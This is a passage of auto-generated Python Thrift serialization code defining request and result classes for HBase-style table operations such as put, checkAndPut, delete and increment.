oprot.writeFieldBegin('table', TType.STRING, 1)
oprot.writeString(self.table)
oprot.writeFieldEnd()
if self.gets is not None:
oprot.writeFieldBegin('gets', TType.LIST, 2)
oprot.writeListBegin(TType.STRUCT, len(self.gets))
for iter48 in self.gets:
iter48.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.table is None:
raise TProtocol.TProtocolException(message='Required field table is unset!')
if self.gets is None:
raise TProtocol.TProtocolException(message='Required field gets is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getMultiple_result:
"""
Attributes:
- success
- io
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.STRUCT,(TResult, TResult.thrift_spec)), None, ), # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
)
def __init__(self, success=None, io=None,):
self.success = success
self.io = io
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype52, _size49) = iprot.readListBegin()
for _i53 in xrange(_size49):
_elem54 = TResult()
_elem54.read(iprot)
self.success.append(_elem54)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getMultiple_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRUCT, len(self.success))
for iter55 in self.success:
iter55.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class put_args:
"""
Attributes:
- table: the table to put data in
- put: the TPut to put
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'table', None, None, ), # 1
(2, TType.STRUCT, 'put', (TPut, TPut.thrift_spec), None, ), # 2
)
def __init__(self, table=None, put=None,):
self.table = table
self.put = put
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.table = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.put = TPut()
self.put.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('put_args')
if self.table is not None:
oprot.writeFieldBegin('table', TType.STRING, 1)
oprot.writeString(self.table)
oprot.writeFieldEnd()
if self.put is not None:
oprot.writeFieldBegin('put', TType.STRUCT, 2)
self.put.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.table is None:
raise TProtocol.TProtocolException(message='Required field table is unset!')
if self.put is None:
raise TProtocol.TProtocolException(message='Required field put is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class put_result:
"""
Attributes:
- io
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
)
def __init__(self, io=None,):
self.io = io
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('put_result')
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class checkAndPut_args:
"""
Attributes:
- table: to check in and put to
- row: row to check
- family: column family to check
- qualifier: column qualifier to check
- value: the expected value, if not provided the
check is for the non-existence of the
column in question
- put: the TPut to put if the check succeeds
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'table', None, None, ), # 1
(2, TType.STRING, 'row', None, None, ), # 2
(3, TType.STRING, 'family', None, None, ), # 3
(4, TType.STRING, 'qualifier', None, None, ), # 4
(5, TType.STRING, 'value', None, None, ), # 5
(6, TType.STRUCT, 'put', (TPut, TPut.thrift_spec), None, ), # 6
)
def __init__(self, table=None, row=None, family=None, qualifier=None, value=None, put=None,):
self.table = table
self.row = row
self.family = family
self.qualifier = qualifier
self.value = value
self.put = put
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.table = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.row = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.family = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRING:
self.qualifier = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.STRING:
self.value = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.STRUCT:
self.put = TPut()
self.put.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('checkAndPut_args')
if self.table is not None:
oprot.writeFieldBegin('table', TType.STRING, 1)
oprot.writeString(self.table)
oprot.writeFieldEnd()
if self.row is not None:
oprot.writeFieldBegin('row', TType.STRING, 2)
oprot.writeString(self.row)
oprot.writeFieldEnd()
if self.family is not None:
oprot.writeFieldBegin('family', TType.STRING, 3)
oprot.writeString(self.family)
oprot.writeFieldEnd()
if self.qualifier is not None:
oprot.writeFieldBegin('qualifier', TType.STRING, 4)
oprot.writeString(self.qualifier)
oprot.writeFieldEnd()
if self.value is not None:
oprot.writeFieldBegin('value', TType.STRING, 5)
oprot.writeString(self.value)
oprot.writeFieldEnd()
if self.put is not None:
oprot.writeFieldBegin('put', TType.STRUCT, 6)
self.put.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.table is None:
raise TProtocol.TProtocolException(message='Required field table is unset!')
if self.row is None:
raise TProtocol.TProtocolException(message='Required field row is unset!')
if self.family is None:
raise TProtocol.TProtocolException(message='Required field family is unset!')
if self.qualifier is None:
raise TProtocol.TProtocolException(message='Required field qualifier is unset!')
if self.put is None:
raise TProtocol.TProtocolException(message='Required field put is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class checkAndPut_result:
"""
Attributes:
- success
- io
"""
thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
)
def __init__(self, success=None, io=None,):
self.success = success
self.io = io
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool();
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('checkAndPut_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class putMultiple_args:
"""
Attributes:
- table: the table to put data in
- puts: a list of TPuts to commit
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'table', None, None, ), # 1
(2, TType.LIST, 'puts', (TType.STRUCT,(TPut, TPut.thrift_spec)), None, ), # 2
)
def __init__(self, table=None, puts=None,):
self.table = table
self.puts = puts
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.table = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.LIST:
self.puts = []
(_etype59, _size56) = iprot.readListBegin()
for _i60 in xrange(_size56):
_elem61 = TPut()
_elem61.read(iprot)
self.puts.append(_elem61)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('putMultiple_args')
if self.table is not None:
oprot.writeFieldBegin('table', TType.STRING, 1)
oprot.writeString(self.table)
oprot.writeFieldEnd()
if self.puts is not None:
oprot.writeFieldBegin('puts', TType.LIST, 2)
oprot.writeListBegin(TType.STRUCT, len(self.puts))
for iter62 in self.puts:
iter62.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.table is None:
raise TProtocol.TProtocolException(message='Required field table is unset!')
if self.puts is None:
raise TProtocol.TProtocolException(message='Required field puts is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class putMultiple_result:
"""
Attributes:
- io
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
)
def __init__(self, io=None,):
self.io = io
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('putMultiple_result')
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class deleteSingle_args:
"""
Attributes:
- table: the table to delete from
- deleteSingle: the TDelete to delete
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'table', None, None, ), # 1
(2, TType.STRUCT, 'deleteSingle', (TDelete, TDelete.thrift_spec), None, ), # 2
)
def __init__(self, table=None, deleteSingle=None,):
self.table = table
self.deleteSingle = deleteSingle
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.table = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.deleteSingle = TDelete()
self.deleteSingle.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('deleteSingle_args')
if self.table is not None:
oprot.writeFieldBegin('table', TType.STRING, 1)
oprot.writeString(self.table)
oprot.writeFieldEnd()
if self.deleteSingle is not None:
oprot.writeFieldBegin('deleteSingle', TType.STRUCT, 2)
self.deleteSingle.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.table is None:
raise TProtocol.TProtocolException(message='Required field table is unset!')
if self.deleteSingle is None:
raise TProtocol.TProtocolException(message='Required field deleteSingle is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class deleteSingle_result:
"""
Attributes:
- io
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
)
def __init__(self, io=None,):
self.io = io
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('deleteSingle_result')
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class deleteMultiple_args:
"""
Attributes:
- table: the table to delete from
- deletes: list of TDeletes to delete
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'table', None, None, ), # 1
(2, TType.LIST, 'deletes', (TType.STRUCT,(TDelete, TDelete.thrift_spec)), None, ), # 2
)
def __init__(self, table=None, deletes=None,):
self.table = table
self.deletes = deletes
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.table = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.LIST:
self.deletes = []
(_etype66, _size63) = iprot.readListBegin()
for _i67 in xrange(_size63):
_elem68 = TDelete()
_elem68.read(iprot)
self.deletes.append(_elem68)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('deleteMultiple_args')
if self.table is not None:
oprot.writeFieldBegin('table', TType.STRING, 1)
oprot.writeString(self.table)
oprot.writeFieldEnd()
if self.deletes is not None:
oprot.writeFieldBegin('deletes', TType.LIST, 2)
oprot.writeListBegin(TType.STRUCT, len(self.deletes))
for iter69 in self.deletes:
iter69.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.table is None:
raise TProtocol.TProtocolException(message='Required field table is unset!')
if self.deletes is None:
raise TProtocol.TProtocolException(message='Required field deletes is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class deleteMultiple_result:
"""
Attributes:
- success
- io
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.STRUCT,(TDelete, TDelete.thrift_spec)), None, ), # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
)
def __init__(self, success=None, io=None,):
self.success = success
self.io = io
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype73, _size70) = iprot.readListBegin()
for _i74 in xrange(_size70):
_elem75 = TDelete()
_elem75.read(iprot)
self.success.append(_elem75)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('deleteMultiple_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRUCT, len(self.success))
for iter76 in self.success:
iter76.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class checkAndDelete_args:
"""
Attributes:
- table: to check in and delete from
- row: row to check
- family: column family to check
- qualifier: column qualifier to check
- value: the expected value, if not provided the
check is for the non-existence of the
column in question
- deleteSingle: the TDelete to execute if the check succeeds
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'table', None, None, ), # 1
(2, TType.STRING, 'row', None, None, ), # 2
(3, TType.STRING, 'family', None, None, ), # 3
(4, TType.STRING, 'qualifier', None, None, ), # 4
(5, TType.STRING, 'value', None, None, ), # 5
(6, TType.STRUCT, 'deleteSingle', (TDelete, TDelete.thrift_spec), None, ), # 6
)
def __init__(self, table=None, row=None, family=None, qualifier=None, value=None, deleteSingle=None,):
self.table = table
self.row = row
self.family = family
self.qualifier = qualifier
self.value = value
self.deleteSingle = deleteSingle
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.table = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.row = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.family = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRING:
self.qualifier = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.STRING:
self.value = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.STRUCT:
self.deleteSingle = TDelete()
self.deleteSingle.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('checkAndDelete_args')
if self.table is not None:
oprot.writeFieldBegin('table', TType.STRING, 1)
oprot.writeString(self.table)
oprot.writeFieldEnd()
if self.row is not None:
oprot.writeFieldBegin('row', TType.STRING, 2)
oprot.writeString(self.row)
oprot.writeFieldEnd()
if self.family is not None:
oprot.writeFieldBegin('family', TType.STRING, 3)
oprot.writeString(self.family)
oprot.writeFieldEnd()
if self.qualifier is not None:
oprot.writeFieldBegin('qualifier', TType.STRING, 4)
oprot.writeString(self.qualifier)
oprot.writeFieldEnd()
if self.value is not None:
oprot.writeFieldBegin('value', TType.STRING, 5)
oprot.writeString(self.value)
oprot.writeFieldEnd()
if self.deleteSingle is not None:
oprot.writeFieldBegin('deleteSingle', TType.STRUCT, 6)
self.deleteSingle.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.table is None:
raise TProtocol.TProtocolException(message='Required field table is unset!')
if self.row is None:
raise TProtocol.TProtocolException(message='Required field row is unset!')
if self.family is None:
raise TProtocol.TProtocolException(message='Required field family is unset!')
if self.qualifier is None:
raise TProtocol.TProtocolException(message='Required field qualifier is unset!')
if self.deleteSingle is None:
raise TProtocol.TProtocolException(message='Required field deleteSingle is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class checkAndDelete_result:
"""
Attributes:
- success
- io
"""
thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
)
def __init__(self, success=None, io=None,):
self.success = success
self.io = io
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool();
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('checkAndDelete_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class increment_args:
"""
Attributes:
- table: the table to increment the value on
- increment: the TIncrement to increment
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'table', None, None, ), # 1
(2, TType.STRUCT, 'increment', (TIncrement, TIncrement.thrift_spec), None, ), # 2
)
def __init__(self, table=None, increment=None,):
self.table = table
self.increment = increment
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.table = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.increment = TIncrement()
self.increment.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
